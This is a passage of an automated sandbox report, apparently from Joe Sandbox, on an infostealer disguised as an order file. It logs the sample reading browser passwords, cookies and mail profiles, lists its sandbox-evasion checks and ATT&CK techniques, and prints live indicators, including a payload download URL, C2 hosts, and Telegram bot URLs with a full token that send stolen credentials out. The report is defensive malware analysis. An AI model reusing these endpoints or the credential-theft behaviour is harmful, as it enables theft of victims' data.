            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -598250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -598141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -597922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -597813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -597688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -597578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -597469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -597344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -597235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -596985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -596860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -596735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -596610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -596485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -596360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -596247s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -596125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -596016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -595891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -595781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -595672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -595562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -595453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -595344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -595125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -595016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -594891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -594766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -594656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -594547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -594437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -594328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_00402868 FindFirstFileW,4_2_00402868
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_004065DA FindFirstFileW,FindClose,4_2_004065DA
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004059A9
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599639Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599516Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599406Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598703Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598469Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598141Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597922Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597813Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597688Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597578Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597344Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596247Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596016Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595891Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595781Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595562Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595453Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595344Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595125Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595016Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 594891Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 594766Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 594656Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 594547Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 594437Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 594328Jump to behavior
            Source: ORDER 20240986 OA.exe, 00000000.00000002.2287296673.0000000000808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\FE
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2950903894.0000000007718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2950903894.0000000007778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D65000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $dqEmultipart/form-data; boundary=------------------------8dd0b6f4848dbcf<
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $dqEmultipart/form-data; boundary=------------------------8dd0b4a7224cc3a<
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeAPI call chain: ExitProcess graph end nodegraph_0-4503
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeAPI call chain: ExitProcess graph end nodegraph_0-4349
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_00404243 LdrInitializeThunk,SendMessageW,0_2_00404243
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_6FBB1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FBB1B63
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess created: C:\Users\user\Desktop\ORDER 20240986 OA.exe "C:\Users\user\Desktop\ORDER 20240986 OA.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeQueries volume information: C:\Users\user\Desktop\ORDER 20240986 OA.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ORDER 20240986 OA.exe PID: 7832, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.2970820723.0000000037CDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ORDER 20240986 OA.exe PID: 7832, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ORDER 20240986 OA.exe PID: 7832, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            11
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            1
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            3
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            4
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging15
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            ORDER 20240986 OA.exe45%ReversingLabsWin32.Trojan.Generic
            ORDER 20240986 OA.exe33%VirustotalBrowse
            ORDER 20240986 OA.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsx1318.tmp\System.dll3%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://sierrassinfinusadas.com.ar/yak/ZnWGURK2.bin30%Avira URL Cloudsafe
            https://sierrassinfinusadas.com.ar/yak/ZnWGURK2.bin0%Avira URL Cloudsafe
            https://sierrassinfinusadas.com.ar/yak/ZnWGURK2.bin0%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            reallyfreegeoip.org
            188.114.96.3
            truefalse
              high
              api.telegram.org
              149.154.167.220
              truefalse
                high
                sierrassinfinusadas.com.ar
                167.250.5.91
                truefalse
                  high
                  checkip.dyndns.com
                  158.101.44.242
                  truefalse
                    high
                    checkip.dyndns.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:897506%0D%0ADate%20and%20Time:%2022/11/2024%20/%2006:52:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20897506%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                        high
                        https://api.telegram.org/bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553726543&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.75false
                            high
                            http://checkip.dyndns.org/false
                              high
                              https://sierrassinfinusadas.com.ar/yak/ZnWGURK2.binfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              https://api.telegram.org/bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553726543&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037DC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/chrome_newtabORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://sierrassinfinusadas.com.ar/yak/ZnWGURK2.bin3ORDER 20240986 OA.exe, 00000004.00000002.2950903894.0000000007718000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://duckduckgo.com/ac/?q=ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.orgORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CB5000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/botORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D65000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://chrome.google.com/webstore?hl=enHORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:897506%0D%0ADate%20aORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.office.com/HORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.orgORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CF6000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CA8000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038F4F000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CDA000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038D1D000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nsis.sf.net/NSIS_ErrorErrorORDER 20240986 OA.exe, 00000000.00000000.1676481705.000000000040A000.00000008.00000001.01000000.00000003.sdmp, ORDER 20240986 OA.exe, 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                                            high
                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CF6000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CA8000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038F4F000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CDA000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038D1D000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://chrome.google.com/webstore?hl=enORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D92000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.ecosia.org/newtab/ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://varders.kozow.com:8081ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://chrome.google.com/webstore?hl=enWebORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.office.com/lBdqORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037DBE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://aborters.duckdns.org:8081ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ac.ecosia.org/autocomplete?q=ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://chrome.google.com/webstore?hl=enlBdqORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://51.38.247.67:8081/_send_.php?LORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://anotherarmy.dns.army:8081ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
